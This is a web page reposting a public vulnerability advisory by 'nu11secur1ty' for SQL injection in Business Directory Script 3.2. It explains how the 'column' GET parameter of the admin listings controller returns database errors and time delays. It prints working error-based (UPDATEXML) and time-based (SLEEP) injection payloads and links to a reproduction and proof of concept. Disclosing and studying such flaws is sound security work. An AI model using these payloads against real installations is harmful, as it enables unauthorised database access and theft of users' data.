Home Tools Exploits & CVE's Business Directory Script 3.2 SQL Injection

Business Directory Script 3.2 SQL Injection

August 28, 2023

170

Business Directory Script version 3.2 suffers from a remote SQL injection vulnerability.

## Title: Business-Directory-Script-3.2 SQLi
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `column` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the column parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. Additionally, the payload
(select*from(select(sleep(20)))a) was submitted in the column
parameter. The application took 20271 milliseconds to respond to the
request, compared with 230 milliseconds for the original request,
indicating that the injected SQL command caused a time delay. The
attacker can steal all information from the database of the server of
this application!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT
(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT
6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)

## Time spend:
01:35:00

Business Directory Script 3.2 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Organizations patch CISA KEV list bugs 3.5 times faster than others,...

Ukraine records increase in financially motivated attacks by Russian hackers

NATO and EU condemn ‘intensifying’ Russian sabotage and hybrid operations

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

2023 Online Course Registration 1.0 SQL Injection

WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload

Sielco PolyEco Digital FM Transmitter 2.0.6 POST Manipulation